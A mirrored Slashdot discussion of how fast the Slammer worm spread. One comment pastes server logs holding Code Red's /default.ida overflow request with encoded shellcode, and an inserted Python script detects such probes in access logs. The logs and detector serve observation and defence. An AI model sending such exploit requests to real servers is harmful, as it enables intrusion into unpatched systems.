Slashdot Mirror


Worms Going Further, Faster

Major Byte writes "Rob Kolstad's MOTD (pdf) column in Usenix ;login: passes along a few distilled factoids from a CAIDA analysis of the 'Sapphire/Slammer' Worm. When it was at full blast it was scanning over 3 billion systems per hour--a speed that 'a "better" vulnerability would have enabled infection of the entire internet in 15 minutes, a "flash worm" or a "Warhol Worm."' I think 'better' to mean 'able to infect across a lot of platforms.'"

3 of 301 comments

  1. I'm still getting pestered by Code-Red. by Chyeburashka · · Score: 0, Troll

    216.31.149.142 - - [04/Jun/2003:17:15:29 -0600] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 392 "-" "-"
    216.31.149.142 - - [04/Jun/2003:17:17:06 -0600] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 392 "-" "-"
    172.182.46.212 - - [04/Jun/2003:17:46:09 -0600] "GET / HTTP/1.0" 200 7029 "-" "-"
    217.230.180.171 - - [04/Jun/2003:22:05:36 -0600] "OPTIONS * HTTP/1.0" 200 0 "-" "-"
    210.179.95.123 - - [07/Jun/2003:11:16:01 -0600] "GET /sumthin HTTP/1.0" 404 388 "-" "-"
    216.60.56.84 - - [07/Jun/2003:19:38:47 -0600] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 392 "-" "-"
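
An added example, not part of the comment above or of the original page: one way to pick requests shaped like the /default.ida lines in comment 1 out of an access log in Combined Log Format and group them by source address. The sample lines are constructed (documentation IP addresses, abbreviated escape sequence), and the filler-length and escape-count thresholds are assumptions.

```python
import re
from collections import defaultdict

# Combined Log Format. The request field is matched greedily because the
# lines quoted in the comment carry spaces inside the URL.
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(.*)" (\d{3}) \S+ "[^"]*" "[^"]*"$')
# Heuristic (assumed thresholds): an .ida request whose query is a run of 100+
# copies of one letter followed by at least four %uXXXX escapes.
PROBE = re.compile(r'^/[^?]*\.ida\?([A-Za-z])\1{99,}(?:%u[0-9a-f]{4}){4,}', re.I)

def parse(line):
    """Return ip, timestamp, method, target and status, or None if unparseable."""
    m = LINE.match(line.strip())
    if not m:
        return None
    ip, ts, request, status = m.groups()
    parts = request.split()
    if len(parts) < 3:
        return None
    # Rejoin a target that was split by stray whitespace.
    return {"ip": ip, "ts": ts, "method": parts[0],
            "target": "".join(parts[1:-1]), "status": int(status)}

def is_ida_probe(rec):
    return bool(rec) and rec["method"] == "GET" and bool(PROBE.match(rec["target"]))

def summarize(lines):
    """Group matching requests by source address."""
    hits = defaultdict(lambda: {"count": 0, "first": None, "last": None, "statuses": set()})
    for rec in map(parse, lines):
        if is_ida_probe(rec):
            h = hits[rec["ip"]]
            h["count"] += 1
            h["first"] = h["first"] or rec["ts"]
            h["last"] = rec["ts"]
            h["statuses"].add(rec["status"])
    return dict(hits)

# Constructed sample: documentation addresses, escape sequence abbreviated.
FILL, TAIL = "X" * 224, ' HTTP/1.0" 404 392 "-" "-"'
SAMPLE = [
    f'192.0.2.10 - - [04/Jun/2003:17:15:29 -0600] "GET /default.ida?{FILL}%u9090%u6858%ucbd3%u7801%u00=a{TAIL}',
    f'192.0.2.10 - - [04/Jun/2003:17:17:06 -0600] "GET /default.ida?{FILL[:37]} {FILL[37:]}%u9090%u6858% ucbd3%u7801%u00=a{TAIL}',
    '198.51.100.7 - - [04/Jun/2003:17:46:09 -0600] "GET / HTTP/1.0" 200 7029 "-" "-"',
    '203.0.113.5 - - [04/Jun/2003:22:05:36 -0600] "OPTIONS * HTTP/1.0" 200 0 "-" "-"',
]

if __name__ == "__main__":
    for ip, h in summarize(SAMPLE).items():
        print(ip, h["count"], h["first"], h["last"], sorted(h["statuses"]))
```

The recorded status codes show how the server answered each probe, which is the first thing to check when triaging hits like these.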

  2. Re:No worms for me, please! by ryanvm · · Score: 0, Troll

    Antivirus software is for people who, from time to time, make a mistake. Like mis-clicking on an attachment at 3am, or misreading a file type and running an unsafe file.

    Well, I guess it's harder for you than it is for me. You look at the sender, you look at the subject and body, and you look at the attachment. Then, your freaking mail client asks you, "Are you sure you want to open this?" IF you know what to watch out for, those should be plenty of "last chances".

    Antivirus software is for people who run software that has bugs in it. You mentioned you are using Windows...

    Not really, a better solution is to keep your system patched. I contend that most holes are patched quicker than most exploit-type viruses are identified and put into the signature updates. The security holes that cause Code Red, Nimda, etc. always seem to have patches long before the epidemics, don't they?

    Antivirus software is for people who believe in Security In Depth, a school of thought which says that you should use multiple layers of security, so that if one fails you aren't screwed.

    Well, so is encrypting your filesystem, having a locking screensaver, unplugging your network cable when idle, etc. Obviously another layer is a good thing. But at what point do you decide that it's not worth the money or slowdown to take that extra step? And yes, scanning for 50,000 (and growing) data patterns every time you open a file WILL slow your system down.

    Antivirus software is for people whose data is worth more than $50 (or $20 after rebate).

    No it's not - it's for people who would rather spend $50 than understand the internals of their operating system. Not that there's anything wrong with that. I'd rather spend $150 to fix my furnace than learn how to do it myself.

    My point was not that most people don't need antivirus software. They do. I was just disagreeing with the original poster who claimed that knowledgeable users understand the necessity of antivirus software. Not true. Knowledgeable users don't engage in stupid behavior.

  3. Re:No worms for me, please! by ryanvm · · Score: 0, Troll

    I guess the difference of opinion that we have is that you believe it's extremely unlikely that you will someday make a mistake, whereas I believe it's nearly certain that all of us make mistakes every day.

    That about sums it up.